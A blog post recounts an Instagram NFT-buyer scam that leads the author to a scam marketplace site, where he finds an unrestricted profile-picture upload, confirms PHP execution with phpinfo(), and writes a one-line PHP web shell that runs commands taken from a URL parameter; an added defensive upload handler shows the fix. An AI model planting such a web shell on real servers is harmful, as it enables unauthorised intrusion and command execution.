eliseomartelli


In the age of digital connectivity and social media, our virtual lives have become increasingly intertwined with the online world. Instagram, one of the world's most popular social networking platforms, offers us a space to share moments, connect with friends, and even discover new opportunities. However, amidst the genuine connections and inspiring content, a darker side lurks: the realm of scams.

It all started 2 days ago, with a message like this:

Hi. I'll love to purchase some of your work, if they are available for purchase. I am interested in purchasing 4 works digitally as NFT. You need a platform to change them to NFT which is their digital form. Then I'll buy them for 2.70ETH which is $4,900 each. You have a wallet, right?

I then got forwarded to Telegram, which I kindly declined, but I made them email me. Their reply:

That's the marketplace where you can upload your art so that I can purchase it, but you will need to set up an account with them before you can do that.

uniquemost.online

I found myself on a PHP site. I registered an account (with fake credentials) and started exploring the website. I was also looking for some kind of XSS or SQL injection, but then I found something a little more fun.

A file upload box for a profile picture. I tried uploading something that was not an image, and the site accepted it and handed back a path under the same directory I was browsing. That tingled a part of my brain: I suspected a web-shell type of vulnerability.

I quickly made a PHP script to test that assumption:

<?php
phpinfo();
?>

Opening the "profile picture" later showed the phpinfo output. Nice!
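What a safer version of that profile-picture handler looks like, as an added example written for this post (not code from uniquemost.online): it checks the file's bytes rather than its name or Content-Type, re-encodes the image through GD so nothing but pixel data survives, and stores it under a server-chosen name outside the web root. The form field name `avatar` and the directory `/var/app/uploads` are assumptions.

```php
<?php
// Added example, not the scam site's code: a hardened profile-picture upload
// handler that would have stopped the unrestricted upload described above.
// Assumes a form field named "avatar" and a storage directory outside the
// web root at /var/app/uploads (both hypothetical).

declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';              // never served directly
const MAX_BYTES  = 2 * 1024 * 1024;                // 2 MiB
const ALLOWED    = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

function storeAvatar(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Sniff the actual contents; the client-supplied name and type are untrusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('not an allowed image type');
    }
    // Decoding and re-encoding with GD discards anything that is not pixel
    // data, so PHP appended to an image or hidden in metadata does not survive.
    $img = $mime === 'image/png'
        ? imagecreatefrompng($file['tmp_name'])
        : imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('file is not a decodable image');
    }
    // Random server-chosen name and a fixed extension: the user never
    // influences the path, and the directory is not executable by the web server.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    $ok = $mime === 'image/png' ? imagepng($img, $dest) : imagejpeg($img, $dest, 85);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    chmod($dest, 0644);
    return $name; // store in the user record; serve via a read-only handler
}

// Usage from the form handler (hypothetical):
// $stored = storeAvatar($_FILES['avatar']);
```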

Payload

I started writing a little payload to try and get a shell on this site.

<?=`$_GET[0]`?>
